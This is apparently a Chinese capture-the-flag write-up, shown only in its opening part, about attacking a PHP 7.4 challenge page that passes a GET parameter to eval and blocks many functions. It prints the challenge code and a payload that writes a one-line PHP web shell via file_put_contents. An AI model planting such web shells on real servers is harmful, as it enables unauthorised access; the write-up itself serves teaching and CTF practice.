前言:
.............
考点:
php7.4的FFI扩展安全问题以及利用
我的解题思路:
进入环境:
<?php
if (isset($_GET['a'])) {
eval($_GET['a']);
} else {
show_source(__FILE__);
}
先传phpinfo() 看看。
看到open_basedir 想着 能利用 set_ini 来进行读取flag,但是看到 disable_functions
看到禁用了非常多的函数, 连 sysmlink都禁用了,说明我们无法从open_basedir 的层面上绕过。
禁用的函数够多,但是没有禁用 file_put_contents,轻松写马。
pyload:
/?a= file_put_content('1.php','<?php eval($_POST[1]);?>');
连接
没法看到 根目录,显示 没有权限, 看来不是file_put_contents 写个马这么简单。